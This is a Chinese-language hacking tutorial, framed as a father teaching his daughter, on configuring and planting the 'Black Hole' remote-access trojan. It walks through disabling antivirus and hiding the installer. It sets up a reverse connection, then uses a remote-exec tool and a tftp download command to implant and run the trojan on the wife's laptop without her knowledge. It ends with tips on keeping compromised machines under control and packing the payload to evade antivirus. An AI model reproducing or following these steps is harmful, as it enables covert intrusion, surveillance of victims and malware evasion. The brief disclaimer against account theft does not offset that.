木马，是黑客必备的工具；使用木马，是黑客的基本技能。木马用得好，威力可不小，这是黑客圈的名言。所以要想成为一名真正的黑客，一定要会玩转木马。那么我们该如何配置并使用木马呢？请看下文。

自从女儿学会远程入侵后，她就发现了一个新用途。如果她有什么话想对她妈妈说，但是又不想当面说的，就会在她妈妈的笔记本电脑桌面上的“秘密文件里面留言。看到女儿把黑客技术用在正途上，我也非常高兴。

星期六下午，我正在思考接下来要教什么，女儿就冲到我书房，向我求助：“爸爸，你教我一些厉害的黑客技术，我要去跟同学比试！我一听大吃一惊。经过详细询问后，我知道了原委。原来，女儿学会了一些黑客技术后，迫不及待地在同学面前炫耀，自然引起一些电脑用得很好的男同学的不满，于是就向我女儿发起了挑战。

“你现在的本事还不够，不要去比了，学黑客技术不是用来比试的。

“可他们威胁要盗我的QQ号……

“什么？看来我得教你一些特别的东西……

如何配置与使用木马

我对女儿说：“他们要盗你的QQ号，十有八九用的是木马，现在我就教你如何用木马，保证你的那些同学知道后大吃一惊！ 打开电脑，我先关闭杀毒软件，避免它查杀木马。然后挑选了最新版的黑洞木马，再对女儿说：“我用黑洞木马来给你演示一下，其他的木马程序的配置和使用都大同小异，凭你这聪明的脑子，应该难不倒你。

我运行木马目录中的Client.exe文件，它是黑洞木马的客户端文件。第一次运行Client.exe会出现黑洞木马的配置窗口，在窗口中“监听端口处，输入2007（图1），再切换到“连接密码标签，输入连接肉鸡所需的密码，例如123456。其他选项不用动，保持默认即可，点击“确定按钮就设置好了连接密码。

小知识：木马一般都有客户端和服务端，服务端是让远程用户运行的，当用户运行了服务端后，黑客就可以通过客户端对他的电脑进行远程控制了。

接着，我进入软件的主界面，在主界面中依次点击“文件→创建自动运行EXE版本服务端安装程序，弹出“创建安装程序配置窗口，在“安装选项中将“安装过程中显示提示信息、“安装完毕后……快捷方式和“安装完毕后添加……列表三个选项前的钩取消，这样做是为了更好地隐藏木马，否则就等于告诉别人中木马了。

然后，我又切换到“控制选项标签，选中“使用自定义控制密码选项，输入控制密码，例如123456，再切换到“连接选项标签，在“固定连接选项中分别填入本机的IP地址和端口号，这里我填的是老婆笔记本电脑的IP地址192.168.150.1，端口号是2007（图2）。设置完成后点击“生成按钮，木马服务端muma.exe就生成了。

“现在我要将木马服务端上传到你妈妈的电脑中，知道用什么上传吗？我问女儿，她眨了眨眼道：“当然是用Remoxec.exe和tftpd32.exe这对搭档，最近我一直在玩它们。“答对了！我赞许道。

我把tftpd32.exe和muma.exe放在同一个文件夹中，运行Remoxec.exe，在“用户名中填入“new，密码为空，然后在“命令或程序名中输入“tftp -i 192.168.150.1 get muma.exe点击“运行按钮， muma.exe就上传到老婆的笔记本电脑中了（图3）。

现在，等老婆运行muma.exe即可激活木马。当然啦，老婆暂时不在家中，自然不可能激活，这可难不到我，我直接在“命令或程序名输入“muma.exe，点击“运行。在到黑洞木马的客户端看看，瞧，有反应了（图4）。

女儿接手操作后，很快就学会了木马的配置和远程种植，还特意通过黑洞客户端给我看了老婆的电脑桌面。我特意叮嘱女儿，与同学较劲时，不要用木马干坏事，盗号是千万不要做的，这是违法的，这不符合黑客的精神。

我的经验

上文中介绍的是最基本的反弹连接设置（就是让服务端主动连接客户端，这样做的好处是可以避开防火墙，更好地进行远程控制），适合在静态IP地址的情况下使用。

但如果远程用户使用的是ADSL上网，IP地址每次重启后都会改变，这时就需要使用更高级的反弹连接方式，例如FTP更新、ASP更新等，这些方式都可以有效地解决IP地址变更的问题，即使本机的IP地址改变，肉鸡也不会丢，前提是要有一个FTP空间或者ASP空间，有兴趣尝试的朋友可以参考黑洞木马的帮助文档。

当我们配置完木马的服务端程序后，最好能对服务端程序进行加壳等一系列免杀处理，否则服务端很容易被杀毒软件查杀。